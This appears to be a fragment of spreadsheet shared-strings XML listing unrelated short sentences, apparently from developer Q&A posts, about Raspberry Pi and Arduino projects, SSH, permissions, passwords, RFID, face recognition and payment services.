    <t>I've narrowed down the issue to the fact that (the linux user behind) my PHP code doesn't have write permissions on the folder where it should store files.</t>
  </si>
  <si>
    <t>I can think of two ways to solve the issue: either give that php-user permissions, or change the user behind the php code.</t>
  </si>
  <si>
    <t>I broke the program into two: A Door Alarm and a Card Swipe Recording system.</t>
  </si>
  <si>
    <t>As we know, the ssh connection requires command on both master and slave, the slave need to enter 'xhost' and 'sshpass' command to connect to the master.</t>
  </si>
  <si>
    <t>I then enter the serial number of the Button, and don't touch the certificate options, because I already have keys and certificates on my IoT Button.</t>
  </si>
  <si>
    <t>I would like to program wait ten seconds and trigger pressing ENTER key if no data is entered by user.</t>
  </si>
  <si>
    <t>I've looked at quite a couple of online questions, and all of them seem to have the problem of connection reset already when trying to connect via SSH.</t>
  </si>
  <si>
    <t>As mentioned in tutorial, I expect a page to come up for resetting username/password.</t>
  </si>
  <si>
    <t>Is there any way to link the rasp pi camera to load the trained model(in my laptop) in order to have face recognition?</t>
  </si>
  <si>
    <t>I should be able to verify this by reading the logfile, but it never gets updated when I press the website button.</t>
  </si>
  <si>
    <t>I am hoping when I power up the PI its bluetooth name changes to the IP i need to ssh into it or if possible to access/edit the wpa_supplicant.conf file via Bluetooth</t>
  </si>
  <si>
    <t>I have a little concern that once i submit my raspberry pi, the hard work of my code inside the sd card could be accessed through a normal sdcard reader inside the rootfs.</t>
  </si>
  <si>
    <t>If it's input by a person, that person needs to manually enter the key after every boot.</t>
  </si>
  <si>
    <t>It is pretty common for SD cards to become corrupt on the Raspberry Pi and this code would not directly be able to cause this.</t>
  </si>
  <si>
    <t>My problem came from the fact that it was not the same subnet mask : roll:
Now that I change it I can connect with putty SSH from the PC to the rpi .</t>
  </si>
  <si>
    <t>Your XBee module is configured for escaped API mode (), which replaces the bytes 0x7D, 0x7E, 0x11 and 0x13 with 0x7D and the escaped character XORed with 0x20.</t>
  </si>
  <si>
    <t>Take a look at the EMV specifications for contactless payment systems (http://emvco.com) to find out how to access the payment application.</t>
  </si>
  <si>
    <t>The first link in Google has it
http://malcontentcomics.com/systemsboy/2006/07/send-remote-commands-via-ssh.html
What about the sudo, how do you solve entering the password?</t>
  </si>
  <si>
    <t>You will need to use the Raspi-Config tool on the terminal on the Pi to enable SSH access, which in term will allow you to connect to your Pi from Windows via PuTTY.</t>
  </si>
  <si>
    <t>The problem is actually solved by simply omitting the last 5 padding from the decrypted string.</t>
  </si>
  <si>
    <t>It is Bluetooth LE manufacturer advertisements to send a unique identifier, something you have seen if you have detected it with the Raspberry Pi 3.</t>
  </si>
  <si>
    <t>Lastly, the signature for wifi.sta.config changed a few months ago (see docs for details).</t>
  </si>
  <si>
    <t>It is a old issue, but right now works very fine, a few months ago you were need a single reboot for take a permissions, but now I don't to do.</t>
  </si>
  <si>
    <t>Adding the correct password to the Arduino connection code solved the issue for me.</t>
  </si>
  <si>
    <t>The code in the original post won't establish a network unless the password length is at least 8 characters.</t>
  </si>
  <si>
    <t>Whenever there is permission denied error appears/occurs, its either file permissions in case of files or  wrong password entered.</t>
  </si>
  <si>
    <t>Ironically, simply deleting the root CA certificate in the Certificates section of IoTHub also fixes the problem.</t>
  </si>
  <si>
    <t>I guess hardware decoding is not proper in android webrtc library.</t>
  </si>
  <si>
    <t>Same problem I have faced and solved it, reduce expiry time where create json token for password</t>
  </si>
  <si>
    <t>Eclipse may not be aware of this 'backdoor' preprocessor symbol definition (as it probably is using a different compiler for problem detection).</t>
  </si>
  <si>
    <t>Face recognition has broad use in security technology, social networking, cameras, etc.</t>
  </si>
  <si>
    <t>Once an app is signed, the system can detect any change to the appwhether the change is introduced accidentally or by malicious code.</t>
  </si>
  <si>
    <t>Use the tag autocomplete thing to pick the correct "fake" tag.</t>
  </si>
  <si>
    <t>A special key combination, unlikely to be pressed accidentally, is typically used to unlock the keys.</t>
  </si>
  <si>
    <t>Garbled text that is the result of bytes being decoded using an incorrect coding.</t>
  </si>
  <si>
    <t>Microcontrollers of this family are used in barcode readers, hotel card key writers, amateur robotics, and various other embedded systems.</t>
  </si>
  <si>
    <t>The API includes ways to manage the repository changesets, issues on the issue tracker, permissions etc.</t>
  </si>
  <si>
    <t>and This must be done so that the Decoder applications, browsers and Image viewers can decode the encoded file formats.</t>
  </si>
  <si>
    <t>MAC spoofing is a technique for reporting a MAC address different than the one assigned by the hardware manufacturer.</t>
  </si>
  <si>
    <t>Out-of-the-box support for changing, resetting, retrieving and encrypting passwords.</t>
  </si>
  <si>
    <t>Face ID is Apple's face recognition technology that is used in the iPhone X as a biometric locking system.</t>
  </si>
  <si>
    <t>More information about Face ID
Related tags:
face-recognition</t>
  </si>
  <si>
    <t>Smart Pointers Usage
Changed C++ idioms in C++11:
Safe Bool
What breaking changes are introduced in C++11?</t>
  </si>
  <si>
    <t>The first 3 octets identify the manufacturer, the last 3 are to ensure that each address for that manufacturer is unique.</t>
  </si>
  <si>
    <t>I had almost the same problem with Jenkins permissions,
The issue was that Jenkins couldn't write in folders that it doesn't have permissions, so I installed the nodejs plugin automatically in 
I described in better detail here:
Jenkins And NodeJS Plugin - Permission Denied Error=13</t>
  </si>
  <si>
    <t>Invalid value card arecord: main:722: audio open error: no such file or directory
I confirm that Xeneck Stoher says about the Rasbian gui volume/audio in/out selection messing up your ~.asoundrc file, replacing it fixed this issue and the recording / playback now works fine.</t>
  </si>
  <si>
    <t>If the key is stored on the card, nothing prevents an attacker reading the key from a stolen card.</t>
  </si>
  <si>
    <t>There's also the paid (w/ free trial available) app Mountain Duck for mounting SSH directories like SSHFS used to do.</t>
  </si>
  <si>
    <t>The user authentication can be made not only with a username and password but also with an email address or phone number.</t>
  </si>
  <si>
    <t>Error:
ORA-00911: invalid character
Cause:
Identifiers may not start with any ASCII character other than letters and numbers.</t>
  </si>
  <si>
    <t>Increasing the count specified with -c for arping doesn't usually have an effect on improving reliability of the detection of my phone, and besides, if I set it absurdly high, it will start causing problems as the cron job runs every minute.</t>
  </si>
  <si>
    <t>The main issue is that each esp8266 needs to have a token which allows it to authenticate with our server, however going through and changing  each time requires a full recompile and takes almost a minute from start to finish (which is a lot when flashing 1000's of boards).</t>
  </si>
  <si>
    <t>To grant permission manually to the camera I am running following command in terminal:
adb shell pm grant org.tensorflow.demo android.permission.CAMERA
However I am getting following error in return:
Operation not allowed: java.lang.SecurityException: Cannot grant system fixed permission android.permission.CAMERA for package org.tensorflow.demo
The application is running successfully but it does not capture any image.</t>
  </si>
  <si>
    <t>For safety and power consumption issues, what I'd like to have is a way to "reset to 0" this particular GPIO state (I don't care if the others are reset too) if my app crashes, which probably will happen in early development (hopefully, ONLY at this stage).</t>
  </si>
  <si>
    <t>I do this all the time to protect my personal cell phone number - however, the number I am sending is simply my home phone number for my VOIP line.</t>
  </si>
  <si>
    <t>Tripwire offerings solve the security configuration management, continuous monitoring, and incident detection problems facing organizations of all sizes, as stand-alone solutions or in concert with other IT security controls.</t>
  </si>
  <si>
    <t>Take advantage of the Glimpse plugin so you can see what magic is happening under the hood if you need to debug a problem or just want to see what happens :)
The library only deals with authentication - once we give you the user details for the person logging in, you can whatever you want with that (such as, create a new user or update an existing user).</t>
  </si>
  <si>
    <t>I've seen lots of scripts to check websites for changes but none of them fit the senario of needing to log in but without a password.</t>
  </si>
  <si>
    <t>To restate good advice, be careful testing as a rogue keyboard can quickly cause a lot of trouble for you.</t>
  </si>
  <si>
    <t>Notification : 
rendering has change
by default visible in lock screen
 and more
 is now deprecated.</t>
  </si>
  <si>
    <t>When the Arduino is powered up it has an int array stored in the flash, for example:
When the program button is pressed, it then waits for the piezo to pick up a knock and this array then changes to, for example:
(based on http://grathio.com/assets/secret_knock_detector.pde)
How would I write and read the array to/from the EEPROM?</t>
  </si>
  <si>
    <t>It is especially important to know which barcode scanner the incoming data came from so that I know which light to make green or blue and which buzzer to play the sound.</t>
  </si>
  <si>
    <t>I am using the command:
This then returns the fact that a device has been found (this is good) but then later says 
ValueError: No JSON object could be decoded 
Does anyone have a solution as to why this is happening?</t>
  </si>
  <si>
    <t>Following up on my discoveries,
There is 2 things to look at if you ever get this mistake : 
Check if you have X11 forwarding activated in your SSH terminal.</t>
  </si>
  <si>
    <t>Then print your device password to see if se field is correct:
in umqtt/src/mqtt_codec.c constructConnPayload()
mqttOptions-&gt;password is look like this:
SharedAccessSignature sr=IoT-xxxx.azure-devices.net/devices/xxxx&amp;sig=xxxxxxxxxxx&amp;se=1484812561&amp;skn=
If your see se=3600 or not equal to (current UTC time +3600), then your situation is the same as mine.</t>
  </si>
  <si>
    <t>I have rigorously checked that I am using the correct SSID and password.</t>
  </si>
  <si>
    <t>I do realize I would have to jailbreak the iPad, which is not a problem.</t>
  </si>
  <si>
    <t>I upload the signed apk for release but when I create the image there is only developer version of that image, we need a production image of the app (because the app after 1 day close and only show the configuration screen)
This is not related to the image type you download or how you sign the APK.</t>
  </si>
  <si>
    <t>Through pattern matching and conservative estimation, it recognizes and weighs 30k common passwords, common names and surnames according to US census data, popular English words from Wikipedia and US television and movies, and other common patterns like dates, repeats (aaa), sequences (abcd), keyboard patterns (qwertyuiop), and l33t speak.</t>
  </si>
  <si>
    <t>Monitors ajax requests looking for failure
Confirms the connection status by requesting an image or fake resource
Automatically grabs ajax requests made while the connection is down and remakes them
after the connection is restored.</t>
  </si>
  <si>
    <t>Is there any way to block the student who is not scanned his RFID in the entrance first before the exit?</t>
  </si>
  <si>
    <t>The best I can figure is that there's some sort of permission issue?</t>
  </si>
  <si>
    <t>So I tried making it so that when you press the "Login" button, you can do something (e.g.</t>
  </si>
  <si>
    <t>Here in your code, I can see that You are using passDhcpWeb for softAP passkey but it only contains 7 characters whereas according to WiFiAP.cpp the password length should be 8 characters.</t>
  </si>
  <si>
    <t>An increasing number of information systems use other forms of documentation of credentials, such as Biometrics: fingerprints, voice recognition, retinal scans, Facial recognition systems1 , or X.509, Public key certificate, and so on.</t>
  </si>
  <si>
    <t>Popular terminal emulators include xterm, aterm, gnome-terminal, konsole, rxvt, PuTTY, SecureCRT, and many others.</t>
  </si>
  <si>
    <t>There's also an android app that runs off a phone and it scans, connects, and reads the SmartTag sensor just fine when that same button is pressed.</t>
  </si>
  <si>
    <t>The user must have assurance that the web site is authentic before entering ID and password credentials.</t>
  </si>
  <si>
    <t>Your NFC reader would need to support the  VAS protocol and enhanced contactless polling, you would then need to have a NFC signing certificate from Apple and you would need to implement Apples decryption utility to get a consistent payload from each scan.</t>
  </si>
  <si>
    <t>If you get the current character encoding using the CurrentEncoding property, the value is not reliable until after the first Read method, since encoding auto detection is not done until the first call to a Read method.</t>
  </si>
  <si>
    <t>And when i use sudo python myprogram.py, it does NOT detect the gopigo library, and the error is the next: 
I guess it can be something related with permission, but i have no idea how to solve it.</t>
  </si>
  <si>
    <t>I've already tried to embed the username/password into the URI but It's not working properly and I'm aware It's not a good idea to do it so.</t>
  </si>
  <si>
    <t>I was able to hook the RF522 to my Pi Zero and get it to scan both the chip that came with it as well as the NFC of my phone so I'm fairly confident the hardware is good.</t>
  </si>
  <si>
    <t>EDIT:  So I loaded the Android code on my phone (tried on several devices) and got the firmware burned to the ADK, but now I cannot get the phone/device to recognize the ADK.</t>
  </si>
  <si>
    <t>The "authentication failed" message is due to a change in MongoDB 3.0; the authentication mechanism was changed to SCRAM-SHA1.</t>
  </si>
  <si>
    <t>(I believe that you should be able to define a static ip here but haven't messed around with that yet) 
From there, you can connect another computer to the hotspot and ssh into the pi using the 172.20.10.x ip or even ssh directly from the phone.</t>
  </si>
  <si>
    <t>The chip may not be able to automatically enter the correct bootloader mode.</t>
  </si>
  <si>
    <t>Unlike badges and contextual menu items, this button is always available, even when the user is not currently browsing a monitored folder.</t>
  </si>
  <si>
    <t>I need to:
turn off -&gt; sleep some seconds -&gt; turn on the USB power of beaglebone black
to be able to hardware-reset a device that is connected to USB (Huawei E220 Modem)
Already tried soft-reset (with unbind/bind and with authorize 0/1), but software reset is not enough to make the device to work well again; the device has some weird bug, that is triggered by a long-time usage (after a few days connected).</t>
  </si>
  <si>
    <t>I have tried to use a TRY/EXCEPT to insure the connection re-connects, but when the Arduino is plugged in again, it will not recognize the COM port until the computer has been reset.</t>
  </si>
  <si>
    <t>I have a card reader acting as a keyboard that sends the card ID as a single line when a card is detected.</t>
  </si>
  <si>
    <t>This option tells screen that your terminal sends and understands UTF-8 encoded characters.</t>
  </si>
  <si>
    <t>I'm trying to build a simple surveillance program with the Raspberry Pi Camera, using OpenCV for face detection.</t>
  </si>
  <si>
    <t>I actually have managed to come up with a workaround by hacking the library, but it is definitely a HACK and NOT proper C++ coding.</t>
  </si>
  <si>
    <t>The application should start automatically on boot and display the data on the screen without anyone beeing logged.</t>
  </si>
  <si>
    <t>I suppose that the problem exists to newer chips because the Watchdog is still enabled with default values after the system reset.</t>
  </si>
  <si>
    <t>AudioServicesCreateSystemSoundID is returning valid sound identifiers, so it isn't anything as simple as the name of the sound file having different case, i.e.</t>
  </si>
  <si>
    <t>I want anyone that wants to connect to this local wifi (not worldwide) to be able to enter the website so changing everyone's host file is not going to happen.</t>
  </si>
  <si>
    <t>Tried Resetting the root password using &gt;&gt; sudo su passwd or sudo su passwd
Loaded an entirely new image to start from scratch and retied the above.</t>
  </si>
  <si>
    <t>I set up the SSH connection between my desktop and the pi and used putty to create the SSH keys and got the connection working but now I've run into a problem.</t>
  </si>
  <si>
    <t>But, My problem is: 
1- When I open the GPIO control app on the Android when I press + button and enter the token (esp8266); But not any endpoint found.</t>
  </si>
  <si>
    <t>By corrupt, the Android screen will no longer appear on startup and putting SD into new hardware does not remedy.</t>
  </si>
  <si>
    <t>The problem is, whenever I try to verify a valid card, the function that handles it keeps returning the wrong value.</t>
  </si>
  <si>
    <t>The Pi currently has a passwordless setup (I had previously used keygen to generate a password file) I can simply type
into the terminal to access it without a password.</t>
  </si>
  <si>
    <t>To do so, once your connect to MySQL, simply run thoses commands (replace password with the password you want) :"
"So you now have a web server, connected to PHP and MySQL.</t>
  </si>
  <si>
    <t>Thanks in advance
EDIT 1: Basically as I figured out, it has to do more with the face recognition part.</t>
  </si>
  <si>
    <t>', 'xyz': '1'}
OK
AT+HTTPACTION=1
OK
+HTTPACTION: 1,601,0
I am pretty sure this is not due to any faulty hardware; I was able to send SMS messages successfully.</t>
  </si>
  <si>
    <t>I am able to change the authentication id using Serial event interupt in Arduino, but my pin change interupt is working only once, so I cannot finish the 2nd transaction.</t>
  </si>
  <si>
    <t>Since you are using bluetooth conection, you can simply validate the MAC address of the phone o other unique information.</t>
  </si>
  <si>
    <t>If the sensors use I2C then the limit is 128 devices on the bus, but they each have to have a unique address which are sometimes "hard-coded" on the device by the manufacturer.</t>
  </si>
  <si>
    <t>Unless identifiers are declared const having static linkage identifiers in header files usually leads to trouble.</t>
  </si>
  <si>
    <t>If, on the other hand, this script reports that the ssh service is running, but you still can't connect from the outside, the problem is not the ssh service, but it lies elsewhere, so it's back to the drawing board for you.</t>
  </si>
  <si>
    <t>Depending on hardware memory I am also considering the fact that it may corrupt some other memory contents also.</t>
  </si>
  <si>
    <t>Most Mobile Phones are discoverable only when they are in settings screen ( Android,IOS and Windows Phones), but unlike the headset case they are connectable.</t>
  </si>
  <si>
    <t>To enable remote connections to the MySQL Server you need to change value of the bind-address in the MySQL Configuration File.</t>
  </si>
  <si>
    <t>systemctl restart mysql.service
Now Ubuntu Server will allow remote access to the MySQL Server, But still you need to configure MySQL users to allow access from any host.</t>
  </si>
  <si>
    <t>Move project folder to common hard drive folder
The mkdir error wasn't about linux user rights or SSH setup.</t>
  </si>
  <si>
    <t>This caused connection problems since it was still trying to use the wrong credentials even after changing them in the variable in the app.</t>
  </si>
  <si>
    <t>The process of image creation does not encrypt (or at least hash) the password onto the card.</t>
  </si>
  <si>
    <t>For enabling ssh first with without keyboard/monitor you need to create an empty ssh file inside SD card.</t>
  </si>
  <si>
    <t>Maybe you see a kernel panic or kernel oops on the screen, maybe you can just login on the terminal and look what happened (maybe the network is down for some reason).</t>
  </si>
  <si>
    <t>I did know that I need a DISPLAY variable to the location of the X Display, but I was not aware of the fact that it needs authorization as well.</t>
  </si>
  <si>
    <t>...
Touch  reports  always  originate  from  the  AR1100  and are 
  transmitted  in  response  to  touch  detection.</t>
  </si>
  <si>
    <t>This is kind of overkill in that it appears the IDE generates a GUID, which is pretty unique, and uses that to create what is like 99.999999999% likely to be a unique Preprocessor macro name or identifier.</t>
  </si>
  <si>
    <t>I'd still run into 401 UNAUTHORIZED failures so I decreased it to 30 minutes, then 20 minutes, then even just 10 minutes, but I would still see the same error at least once per day, and sometimes more.</t>
  </si>
  <si>
    <t>taking steps to ensure that data will not be accidentally or maliciously changed or altered, or verifying whether data has already been changed in such a way.</t>
  </si>
  <si>
    <t>Paytrail is an electronic payment service that the consumer can use to pay for his online purchases.</t>
  </si>
  <si>
    <t>Some characters are not valid when used as-is in URLs, and so much be URL-encoded (percent-encoded) when appearing in URLs.</t>
  </si>
  <si>
    <t>A Security Identifier is a unique alpha-numeric String assigned by an authentication agent and is used to identify a user or a group of users.</t>
  </si>
  <si>
    <t>Ignoring the content of identifiers and numbers allows such detectors to match code where names have been changed or different values have been used.</t>
  </si>
  <si>
    <t>If the
     Accept-Encoding field-value is empty, then only the "identity"
     encoding is acceptable.</t>
  </si>
  <si>
    <t>New pull requests will not be accepted unless they fix core bugs or security issues.</t>
  </si>
  <si>
    <t>Once an application is signed, the system can detect any change to the applicationwhether the change is introduced accidentally or by malicious code.</t>
  </si>
  <si>
    <t>LastPass seeks to resolve the password fatigue problem by centralising user password management in the cloud.</t>
  </si>
  <si>
    <t>Each card has a unique Object identifier and represents a certain Object item.</t>
  </si>
  <si>
    <t>Fixed issue where hard coded column data types were not honored in generated databases.</t>
  </si>
  <si>
    <t>Introduction
Bencoding, pronounced "B-encoding", is the encoding used by BitTorrent, a peer-to-peer file sharing protocol.</t>
  </si>
  <si>
    <t>Paytrail is an electronic payment service that you (the consumer) can use to pay for your online purchases.</t>
  </si>
  <si>
    <t>It's new Face Detection in Google Play services, includes vision API for detecting faces and barcodes.</t>
  </si>
  <si>
    <t>zxing.net is a library which supports decoding and generating of barcodes (like QR Code, PDF 417, EAN, UPC, Aztec, Data Matrix, Codabar) within images.</t>
  </si>
  <si>
    <t>The Encoding Standard at https://encoding.spec.whatwg.org/ defines character encoding for the Web.</t>
  </si>
  <si>
    <t>Action: Enter a valid username and password combination in the correct
  format.</t>
  </si>
  <si>
    <t>If the ssh server started before your script then you will be able to connect remotely from another computer
Follow Ignacio's recommendation: by taking out the SD card and mounting the SD card on another linux computer and deleting your init script
If you only have a mac or windows machine then you will only be able to edit the boot parition of the SD card.</t>
  </si>
  <si>
    <t>Machine.Fakes attempts to simplify the usage of such fake frameworks on top of MSpec by helping to reduce a lot of the typical fake framework related clutter code in specifications.</t>
  </si>
  <si>
    <t>An Internet protocol camera, or IP camera, is a type of digital video camera commonly employed for surveillance, and which unlike analog closed circuit television (CCTV) cameras can send and receive data via computer network and the Internet.</t>
  </si>
  <si>
    <t>I am working on a school project, basically I have to create a lock system that opens a fictive gate when the correct code is entered.</t>
  </si>
  <si>
    <t>I have been trying for the opposite - open the window, verify, and then change a couple of images on the window if verified.</t>
  </si>
  <si>
    <t>I am trying to make some basic facial recognition with my raspberry pi using OpenCV-python, however, I am unable to install OpenCV-python using pip3.</t>
  </si>
  <si>
    <t>While it is not possible to uncheck a particular radio button, the radio group can be cleared to remove the checked state.</t>
  </si>
  <si>
    <t>In case you were wondering what code I used for the pro micro:
About the BLE HM10 module I pretty much use the default settings but changed the name and password.</t>
  </si>
  <si>
    <t>If I provide credentials using wpa_cli, it tries to connect to the AP but throws out an error as below
How to solve this issue, I referred other places for disabling the 
a) network manager: As I did that, it did not solve this</t>
  </si>
  <si>
    <t>Note: This is more a hack than an officially supported solution, you will have to re-do that operation everytime you upgrade the OS image.</t>
  </si>
  <si>
    <t>Apple have recently made new changes in APNs and now apple insist us to use "Token Based Authentication" instead of the traditional ways which we are using for push notification.</t>
  </si>
  <si>
    <t>It could enable payments at the point of Sale (POS) such that you dont need to remove your wallet or card to make a payment.</t>
  </si>
  <si>
    <t>When a person leaves the organization or joins the organization, the person must be removed from or added to all the relevant access control lists.</t>
  </si>
  <si>
    <t>The X display system has very good security to stop random local processes from just displaying stuff to the local screen (It was more a problem in the old days of expensive Sun and SGI systems where computer labs would often let users telnet to other boxes.</t>
  </si>
  <si>
    <t>The only thing I did wrong on this - I setup automatic start up before ever connecting to the vnc server or setting up the password, which makes me think might be the root of the problem.</t>
  </si>
  <si>
    <t>the problem is i don't know how to make the arduino sends data to the website , i mean how to make a code where i put my username and password of the site and make the arduino sends the data.</t>
  </si>
  <si>
    <t>Optical character recognition, usually abbreviated to OCR, is the mechanical or electronic translation of scanned images of handwritten, typewritten or printed text into machine-encoded text.</t>
  </si>
  <si>
    <t>Thereby, I was stuck during formulation of idea, since I am not finding any way that how:
When Professor asks my action to mark attendance and then that will trigger Raspberry PI Software or script to mark attendance using a Fingerprint Module attached to it from students.</t>
  </si>
  <si>
    <t>Edit: I missed where you said you wanted to do the detection on the Raspberry Pi itself, not the phone.</t>
  </si>
  <si>
    <t>After that put SD card to rPi and log in with NEW password.</t>
  </si>
  <si>
    <t>Took me a minute to realize these ARE the common passwords.</t>
  </si>
  <si>
    <t>Maybe you have not installed ssh server 
check that, if not : 
try in Terminal:</t>
  </si>
  <si>
    <t>Use a SSH client, like PuTTy, to connect to the IP address shown
Hope this works!</t>
  </si>
  <si>
    <t>It turns out that all the posts about WifiClientSecure are obsolete (or simply unnecessary).</t>
  </si>
  <si>
    <t>For that matter: 
I generate RSA key for the rpi0 ( my first note ) and  it to the rpi1 ( my second note ) 
I checked that RSA key located on the both notes for mpiu@rpi1 it will be authorized_key file (as far as i'm understand ) 
for the mpiu@rpi0 it will be files id_rsa and id_rsa_pub
Now I need to make changes in rpi0 .bashrc file to establish key chain ( here problems begun ) 
3.1.</t>
  </si>
  <si>
    <t>Examples include:
Face recognition Nerf gun
Speech recognition for transcription of video conferences
Predictive analytics to audit data quality
Sentiment analysis of Twitter stream
OCR of .pdf documents to visualize government data
OCR with Google Glass</t>
  </si>
  <si>
    <t>A common approach is to repeatedly try guesses for the password.</t>
  </si>
  <si>
    <t>Using the last code, I am able to detect the barcode location in the image but cannot scan barcode.</t>
  </si>
  <si>
    <t>I can ping the device if I scan which new devices entered the wifi net work, and the SSID and password data are correct (I've edited them out here).</t>
  </si>
  <si>
    <t>I connect to the pi using a wifi router, so when I open the terminal, it automatically asks me for the password.</t>
  </si>
  <si>
    <t>There is no existing XAUTHORITY or DISPLAY defined
to be able to connect to display you need.</t>
  </si>
  <si>
    <t>I'm following this tutorial : http://www.pyimagesearch.com/2015/06/01/home-surveillance-and-motion-detection-with-the-raspberry-pi-python-and-opencv/
It's a tutorial to build a home surveillance and motion detection with a raspberry pi in python intergrating dropbox (or not).</t>
  </si>
  <si>
    <t>my settings looks like this:
When I run manage.py migrate, I get this error:
I have mounted the drive to /mnt/MOCStorage and used chmod to change the permissions of /mnt and /mnt/MOCStorage to 775.</t>
  </si>
  <si>
    <t>Summary:  cheap, easy, weak detection ability.</t>
  </si>
  <si>
    <t>I've followed this tutorial : https://docs.wso2.com/display/IoTS300/Changing+the+Super+Administrator+Password
And I tried a lot of times to reboot the server, in the order first broker then core and analytics.</t>
  </si>
  <si>
    <t>Here's an example of a subquery that fetches all user information for the active user and friends:
SELECT uid, name, pic_square FROM user WHERE uid = me()
     OR uid IN (SELECT uid2 FROM friend WHERE uid1 = me())
For more information, check out the tables below, most of which have sample queries demonstrating their use.</t>
  </si>
  <si>
    <t>I have Android Things OS image installed for my Rasp3 and successfully booted up and log in to shell using adb, but lcd display is upside down with my 7 inch touchscreen display.</t>
  </si>
  <si>
    <t>I started using Mongoose OS recently, however I did not find a way to create a wifi network for my user to choose the wifi and enter the password.</t>
  </si>
  <si>
    <t>I've installed MPD on a Raspberry Pi and wrote a Python script to play a playlist when a RFID card was scanned.</t>
  </si>
  <si>
    <t>i have to read two fingerprint images one by one, but after reading one fingerprint, the port changes.</t>
  </si>
  <si>
    <t>It works well except one bug: after rasperry reboot NodeJs starts well but iptables redirect is not working until I plug in ehernet and ssh over it.</t>
  </si>
  <si>
    <t>We use similar code in one of our applications to make sure, that our users not accidentally scan EAN codes in other fields such as names and description fields.</t>
  </si>
  <si>
    <t>And as you don't clear previously checked password, you'll get "wrong password" result (and eventually stack overflow).</t>
  </si>
  <si>
    <t>Because other computers are supposedly unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human.</t>
  </si>
  <si>
    <t>For example, a user who relies on a screen reading web browser may be unable to see the CAPTCHA image.</t>
  </si>
  <si>
    <t>The Payment Card Industry Data Security Standard (PCI DSS) is a set of requirements designed to ensure that ALL companies that process, store or transmit credit card information maintain a secure environment.</t>
  </si>
  <si>
    <t>PAYMILL although processes Direct Debit (SEPA)
No monthly costs - you pay only for successful transactions, 
no re-direction or iFrames, 
easy technical solution, 
beautiful REST API and merchant cockpit, 
Subscriptions and Recurring payments incl.</t>
  </si>
  <si>
    <t>Since my Pi does not have a display I want to write it in a fail safe way where it does not matter if somebody pulls the card at any time.</t>
  </si>
  <si>
    <t>When only a (small) part of the QR-code is visible to the camera, the decoding process fails (as is expected).</t>
  </si>
  <si>
    <t>It is a python script that runs a server using webrtc to send the clients/browsers webcam to the server and perform face recognition.</t>
  </si>
  <si>
    <t>I can set hard password, disable tty's and so on, but it's easy to remove SD card and examine in on a PC.</t>
  </si>
  <si>
    <t>Edit: This problem occur in both normal usage with keyboard connected to Pi AND over SSH.</t>
  </si>
  <si>
    <t>Deployment doesn't cause any errors (SSH connection successful and text files written to RPi2 wihout any issues) and neither does running the binaries (via Qt Creator or terminal) on my notebook.</t>
  </si>
  <si>
    <t>I saw on GitHub that a way to do this (assuming the user doesn't hit it themselves) is to instruct the program to hit caps lock until the LED turns on.</t>
  </si>
  <si>
    <t>But the available libraries for IOT look more 'phone-y' than 'Windows 10-y' and I'm wondering if there's just a lot of phone-style security limitations.</t>
  </si>
  <si>
    <t>For the past couple of days i have been trying to create a program which reads from a Tx of barcode scanner.</t>
  </si>
  <si>
    <t>I am working on an Arduino project that uses facial tracking, object tracking, facial recognition etc.</t>
  </si>
  <si>
    <t>I had a previous error with this where it was due to a lack of permissions on the executable and I have done to this file what fixed it for me previously to no avail, I have also changed permissions on the database file.</t>
  </si>
  <si>
    <t>Next - select one of the networks in the list on the phone, enter a password to selected network and send back via bluetooth to Raspberry
I'm using Raspberry pi3 with bluetooth on board, Raspbian OS and nodejs v7.4.0
I choose wifi-control to work with wifi network and it works greate.</t>
  </si>
  <si>
    <t>Now, I have to send and display the processed RPI camera Human detection in webpage of browser when the IP address of RPI is entered.</t>
  </si>
  <si>
    <t>To overcome this fatal flaw, a touchscreen display that has a number pad GUI may be used, with the keys being shuffled every time the pin is entered whether it is correct or not.</t>
  </si>
  <si>
    <t>I'm on the release not insider preview version due to crashes and other stability issues.</t>
  </si>
  <si>
    <t>I want to change super admin password and I followed the instructions in documentation 
Changing
  the Super Administrator Password and in tab 'Changing Password via
  file configuration'.</t>
  </si>
  <si>
    <t>Is the connection between device A and the pi subject to interference or corrupt connections due to device B or is my theory wrong on what is happening between devices?</t>
  </si>
  <si>
    <t>I've done a lot of googling of various different things, and I've seen other people have problems with cryptography on the Pi, but not this specific problem.</t>
  </si>
  <si>
    <t>I've purchased a RaspberryPi 3 B+, booted a NOOBS Raspbian and I've been trying to open a ssh connection via an Ethernet connection for the last couple of days.</t>
  </si>
  <si>
    <t>I am trying to create a ble scanner but only want the device address to be displayed 
The device address is the 12 characters before the  in the outputs.</t>
  </si>
  <si>
    <t>However the issue i'm running into is that I need this to be fairly foolproof as my father in law is old and likely to pull out SD cards before they're completed copying etc.</t>
  </si>
  <si>
    <t>I'm trying to build a simple Python GUI around OpenCV so I can run facial recognition commands easily.</t>
  </si>
  <si>
    <t>If you ever plan on allowing the updating of U-Boot itself then you may also want to consider the possibility of U-Boot getting corrupt when rewritten and have a way to recover.</t>
  </si>
  <si>
    <t>If your sudoer file gets corrupted: type this in terminal window to fix whatever text you have typed wrongly  .</t>
  </si>
  <si>
    <t>It might be caused by my previous attempts to log to the same network but with wrong SSID/Password (issue with spaces solved here).</t>
  </si>
  <si>
    <t>Alternatively you could just use your PC port numbers that you plug your Arduino boards into as the unique identifiers instead.</t>
  </si>
  <si>
    <t>I recommend you to check if ssh is enabled in your device:
then navigate to ssh, hit Enter and select Enable or disable ssh server.</t>
  </si>
  <si>
    <t>These first three octets are called Organizationally Unique Identifiers, or OUI for short , as they are used for "identifying a vendor, manufacturer, or other organization".</t>
  </si>
  <si>
    <t>Read this sentence in your question again and think about it:
In other words, how can connect to wireless and get a link local IP
  without SSID and password?</t>
  </si>
  <si>
    <t>Software that use certain types of drivers may not be supported due to changes in permission models and hardware configurations.</t>
  </si>
  <si>
    <t>These document files gives you fair understanding on scanning for bluetooth devices, running agent for authentication and pairing with your phone.</t>
  </si>
  <si>
    <t>The one difference between your situation and the instances we've seen this happen is that the Edge agent will exit after about a minute instead of a few seconds.</t>
  </si>
  <si>
    <t>It sounds like your Watson IoT Platform client is unable to connect - typically this happens if you've misconfigured the config file (e.g., an incorrect API key/token).</t>
  </si>
  <si>
    <t>We had the same issue in a project, and i moved on LE device do to the fact that apple device are only capable to connect to LE device for "safety" reasons.</t>
  </si>
  <si>
    <t>3-D Secure is an XML-based protocol designed to be an additional security layer for online credit and debit card transactions.</t>
  </si>
  <si>
    <t>He can store his payment card data in the service, thus enabling online payments with the login.</t>
  </si>
  <si>
    <t>Both Gateway-Hosted and Merchant-Hosted payment model can be supported with Payment integration.</t>
  </si>
  <si>
